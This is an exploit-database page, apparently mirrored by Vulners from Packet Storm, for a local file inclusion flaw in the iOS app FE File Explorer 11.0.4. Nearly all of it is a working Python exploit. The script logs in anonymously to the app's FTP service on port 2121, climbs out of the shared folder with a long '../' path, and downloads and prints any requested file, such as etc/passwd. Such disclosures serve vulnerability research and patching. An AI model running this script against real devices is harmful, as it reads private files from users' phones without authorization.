Lucene search
K

FE File Explorer 11.0.4 Local File Inclusion

🗓️ 07 Sep 2022 00:00:00Reported by Chokri HammediType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 244 Views

FE File Explorer 11.0.4 Local File Inclusion from iO

Code
`# Exploit Title: FE File Explorer 11.0.4 Local File inclusion  
# Date: Sep 6, 2022  
# Exploit Author: Chokri Hammedi  
# Vendor Homepage: https://www.skyjos.com/  
# Software Link:  
https://apps.apple.com/us/app/fe-file-explorer-file-manager/id510282524  
# Version: 11.0.4  
# Tested on: iPhone ios 15.6  
  
  
from ftplib import FTP  
import argparse  
  
help = " FE File Explorer Local File inclusion"  
parser = argparse.ArgumentParser(description=help)  
parser.add_argument("--target", help="Target IP", required=True)  
parser.add_argument("--file", help="File To Open eg: etc/passwd")  
  
args = parser.parse_args()  
  
  
ip = args.target  
port = 2121 # Default Port  
files = args.file  
  
  
  
ftpConnection = FTP()  
ftpConnection.connect(host=ip, port=port)  
ftpConnection.login();  
  
def downloadFile():  
  
ftpConnection.cwd('/../../../../../../../../../../../../../../../../')  
ftpConnection.retrbinary(f"RETR {files}", open('data.txt',  
'wb').write)  
ftpConnection.close()  
file = open('data.txt', 'r')  
print (f"[***] The contents of {files}\n")  
print (file.read())  
  
downloadFile()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Sep 2022 00:00Current
7.4High risk
Vulners AI Score7.4
244